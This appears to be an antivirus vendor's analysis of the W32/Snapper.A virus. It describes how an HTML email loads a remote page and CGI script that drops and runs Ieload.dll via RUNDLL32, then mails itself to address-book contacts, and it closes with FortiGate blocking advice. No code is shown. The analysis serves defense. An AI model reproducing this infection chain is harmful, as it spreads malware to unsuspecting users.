Virus

W32/Snapper.A

Analysis


Specifics
This threat was short-lived in that one of the main components are no longer accessible. This threat is composed of four parts;

HTML email message - spawned by the virus as Ieload.dll
HTML web page - accessed when link accessed via email
CGI script - accessed by HTML web page
DLL component - virus; initiates email messages to others

Without the .CGI script component, this threat does not exist.


HTML Email Vector
This threat is introduced to a system via an email message sent from an infected client. The email itself contains a hyperlink to a web address containing HTML code - this code then accesses a .CGI script which creates a local file named Ieload.dll. The file is created from embedded codes within the .CGI script.

The email may arrive in this format -

Subject: Re:
Body:
(none)

The body of the email contains HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.


CGI File Creation
When the email is opened, it accesses a web address and the file "banner.htm". This HTML file uses an Object data tag to access the .CGI script for Internet Explorer browsers 5.0 or 5.5, and if the browser version is 6.0 the HTM code uses an IFRAME to access the .CGI script. The .CGI script contains an embedded .DLL file which is decoded into the Windows folder as "Ieload.dll", with a file size of 8,704 bytes. The .CGI script then activates the .DLL file using the Windows application file RUNDLL32.


DLL Email Creation
When the binary "Ieload.dll" is activated using RUNDLL32, the code then accesses the Windows Address book (WAB) and attempts to generate emails for each contact listed. The email is created in this format -
Subject: Re:
Body:
(none)

The body of the email contains HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.


Recommended Action

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block internal to external access to the IP address 198.170.245.129